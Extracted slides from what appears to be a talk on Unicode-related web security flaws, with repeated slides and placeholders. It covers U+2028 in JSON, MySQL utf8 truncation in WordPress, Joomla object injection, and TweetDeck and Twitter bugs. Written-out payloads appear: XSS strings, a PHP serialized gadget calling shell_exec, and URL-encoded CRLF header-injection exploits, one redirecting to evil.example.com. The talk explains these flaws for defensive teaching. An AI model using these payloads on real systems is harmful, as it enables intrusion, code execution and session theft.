    00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c s (U+0073 LATIN SMALL LETTER S)
  87. None
  88. None
  89. https://mths.be/brl

  90. https://mths.be/brl OBAMA vs. ᴼᴮᴬᴹᴬ

  91. None
  92. https://mths.be/bvf

  93. https://mths.be/bvf

  94. JavaScript vs. JSON

  95. <script> // <?php echo strip($userInput); ?> </script> <?php /* Note:

    `strip()` strips ASCII newlines and `</script`. */ ?>
  96. https://mths.be/brn

  97. https://mths.be/brn

  98. <script> // <?php echo strip($userInput); ?> </script> foo[U+2028]alert('XSS')

  99. <script> // <?php echo strip($userInput); ?> </script> ✘ foo[U+2028]alert('XSS')

  100. JSON ∉ JavaScript

  101. var data = '"Hello\u2028"'; // JSON-formatted data containing a string

    // containing an (unescaped!) Line Separator eval('(' + data + ')'); // h SyntaxError: Unexpected token ILLEGAL JSON.parse(data); // h 'Hello\u2028'
  102. Always escape JSON-formatted data before passing it to a JavaScript

    parser. https://mths.be/jsesc
  103. https://mths.be/jsesc

  104. var data = 'foo\u2028'; var serialized = JSON.stringify(data); // h

    '"foo\u2028"' (contains the raw, unescaped // Unicode symbol) var escaped = jsesc(data, { 'json': true }); // h '"foo\\u2028"' (contains an escape sequence // for the Unicode symbol h safer) JSON.parse(serialized) == JSON.parse(escaped); // h true (both strings unserialize to the same value) https://mths.be/jsesc
  105. var data = 'foo\u2028'; var serialized = JSON.stringify(data); // h

    '"foo\u2028"' (contains the raw, unescaped // Unicode symbol) var escaped = jsesc(data, { 'json': true }); // h '"foo\\u2028"' (contains an escape sequence // for the Unicode symbol h safer) JSON.parse(serialized) == JSON.parse(escaped); // h true (both strings unserialize to the same value) https://mths.be/jsesc
  106. var string = String.fromCharCode(0xD800); // a string containing an (unescaped!)

    // lone surrogate var data = JSON.stringify(string); // the same string as JSON-formatted data storeInDatabaseAsUtf8(data); // h error/crash sendOverWebSocketConnection(data); // h error/crash/DoS
  107. Always escape JSON-formatted data before passing it to a UTF-8

    encoder. https://mths.be/jsesc
  108. https://mths.be/jsesc

  109. var data = 'foo\uD800'; var serialized = JSON.stringify(data); // h

    '"foo\uD800"' (contains the raw, unescaped // Unicode symbol) var escaped = jsesc(data, { 'json': true }); // h '"foo\\uD800"' (contains an escape sequence // for the Unicode symbol h safer) JSON.parse(serialized) == JSON.parse(escaped); // h true (both strings unserialize to the same value) https://mths.be/jsesc
  110. var data = 'foo\uD800'; var serialized = JSON.stringify(data); // h

    '"foo\uD800"' (contains the raw, unescaped // Unicode symbol) var escaped = jsesc(data, { 'json': true }); // h '"foo\\uD800"' (contains an escape sequence // for the Unicode symbol h safer) JSON.parse(serialized) == JSON.parse(escaped); // h true (both strings unserialize to the same value) https://mths.be/jsesc
  111. Phabricator

  112. None
  113. None
  114. None
  115. uses MySQL

  116. uses MySQL’s ✌utf8✌

  117. None
  118. None
  119. https://mths.be/bro

  120. RCE in WordPress < 3.6.1 https://mths.be/brq

  121. CVE-2013-4338 “wp-includes/functions.php in WordPress before 3.6.1 does not properly determine

    whether data has been serialize()d, which allows remote attackers to execute arbitrary code by triggering erroneous PHP unserialize() operations.” https://mths.be/brq
  122. function is_serialized( $data ) { $data = trim( $data );

    $length = strlen( $data ); $lastc = $data[$length - 1]; if ( ';' !== $lastc && '}' !== $lastc ) return false; $token = $data[0]; switch ( $token ) { case 's' : if ( '"' !== $data[$length - 2] ) return false; case 'a' : case 'O' : return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data ); case 'b' : case 'i' : case 'd' : return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/", $data ); } return false; } https://mths.be/brq
  123. function is_serialized( $data ) { $data = trim( $data );

    $length = strlen( $data ); $lastc = $data[$length - 1]; if ( ';' !== $lastc && '}' !== $lastc ) return false; $token = $data[0]; switch ( $token ) { case 's' : if ( '"' !== $data[$length - 2] ) return false; case 'a' : case 'O' : return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data ); case 'b' : case 'i' : case 'd' : return (bool) preg_match( "/^{$token}:[0-9.E-]+;\$/", $data ); } return false; } https://mths.be/brq
  124. WordPress Before writing it to the database, data gets serialized

    only if it’s an array or an object, or if is_serialized($data) returns true (double serialization) After retrieving data from the database, it gets unserialized only if is_serialized($data) returns true https://mths.be/brq
  125. WordPress Before writing it to the database, data gets serialized

    only if it’s an array or an object, or if is_serialized($data) returns true (double serialization) After retrieving data from the database, it gets unserialized only if is_serialized($data) returns true https://mths.be/brq uses MySQL’s ✌utf8✌
  126. http://mths.be/brq

  127. http://mths.be/brq

  128. class Foo { private $command; public function setCommand($command) { $this->command

    = $command; } public function __destruct() { if ($this->command) { shell_exec($this->command); } } } $object = new Foo(); $object->setCommand('echo "pwned!" > /tmp/pwned.txt'); $serialized = serialize($object); $payload = $serialized . '!'; https://mths.be/brq
  129. https://mths.be/brq

  130. RCE in Joomla < 3.4.6 https://mths.be/bvg

  131. CVE-2015-8562 “Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote

    attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015.” https://mths.be/bvg
  132. https://mths.be/bvh Exploit 1. Serialize a specially-crafted object containing PHP code

    to be executed 2. Use that as HTTP User-Agent header value, with ! as suffix
  133. XSS in WordPress < 4.1.2 https://mths.be/buj

  134. foo <q cite='x onmouseover=alert(1) !'> https://mths.be/buj Exploit: post comment

  135. foo <q cite='x onmouseover=alert(1) !'> https://mths.be/buj Exploit: post comment This

    is safe HTML (no XSS).
  136. foo <q cite='x onmouseover=alert(1) !'> https://mths.be/buj Exploit: post comment This

    is safe HTML (no XSS). While saving to the ✌utf8✌ MySQL database, it gets truncated, so we get:
  137. foo <q cite='x onmouseover=alert(1) !'> https://mths.be/buj Exploit: post comment foo

    <q cite=&#8220;x onmouseover=alert(1) … > This is safe HTML (no XSS). While saving to the ✌utf8✌ MySQL database, it gets truncated, so we get:
  138. https://mths.be/buj

  139. TweetDeck

  140. None
  141. None
  142. None
  143. function getTweetHtml(tweet) { var htmlEscapedTweet = htmlEscape(tweet); if (containsEmoji(htmlEscapedTweet)) {

    return replaceSymbolsWithImgTags( AccidentallyUndoHtmlEscaping(htmlEscapedTweet) ); } else { return htmlEscapedTweet; } } https://mths.be/bsq
  144. Twitter

  145. https://mths.be/bsq https://mths.be/buh

  146. https://mths.be/buh symbol CR + LF code point U+000A U+000D URL-encoded

    (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] Broken CRLF filtering symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ]
  147. https://mths.be/buh symbol CR + LF code point U+000A U+000D URL-encoded

    (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] Broken CRLF filtering symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] ✘
  148. https://mths.be/buh symbol 㻿 code point U+560A URL-encoded (note: uses UTF-8!)

    %E5%98%8A decoded (raw bytes) [ 0x56, 0x0A ] Bypass part 1: CR (U+000A)
  149. https://mths.be/buh symbol 㼁 code point U+560D URL-encoded (note: uses UTF-8!)

    %E5%98%8D decoded (raw bytes) [ 0x56, 0x0D ] Bypass part 2: LF (U+000D)
  150. https://mths.be/buh Example exploit %E5%98%8A%E5%98%8DSet-Cookie:%20test

  151. None
  152. https://mths.be/bve

  153. https://mths.be/buh symbol CR + LF code point U+000A U+000D URL-encoded

    (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] Broken CRLF filtering symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ]
  154. https://mths.be/buh symbol CR + LF code point U+000A U+000D URL-encoded

    (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] Broken CRLF filtering symbol CR + LF code point U+000A U+000D URL-encoded (note: uses UTF-8!) %0A%0D decoded (raw bytes) [ 0x0A, 0x0D ] ✘
  155. https://mths.be/bve symbol 㻿 code point U+560A URL-encoded (note: uses UTF-8!)

    %E5%98%8A decoded (raw bytes) [ 0x56, 0x0A ] Bypass part 1: CR (U+000A)
  156. https://mths.be/bve symbol 㼁 code point U+560D URL-encoded (note: uses UTF-8!)

    %E5%98%8D decoded (raw bytes) [ 0x56, 0x0D ] Bypass part 2: LF (U+000D)
  157. https://mths.be/bve Example exploit %E5%98%8A%E5%98%8DLocation:%20https: %2F%2Fevil.example.com%2F

  158. Thanks! Questions? → @mathias